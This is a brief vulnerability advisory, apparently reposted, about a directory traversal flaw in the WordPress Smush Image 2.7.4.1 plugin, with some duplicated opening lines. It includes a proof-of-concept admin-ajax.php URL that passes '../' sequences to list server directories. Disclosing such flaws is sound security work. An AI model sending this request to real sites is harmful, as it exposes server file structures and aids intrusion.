Class File transversal
Remote Yes
Credit Ricardo Sanchez
Smush Image Wordpress WP plugin is prone to file transversal vulnerability
because it fails to sufficiently folder Class File transversal
Remote Yes
Credit Ricardo Sanchez
Smush Image Wordpress WP plugin is prone to file transversal vulnerability
because it fails to sufficiently folders privacy.
To exploit this issue following steps:
Demo url:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx
Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401
WordPress Smush Image 2.7.4.1 Directory Traversal
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 501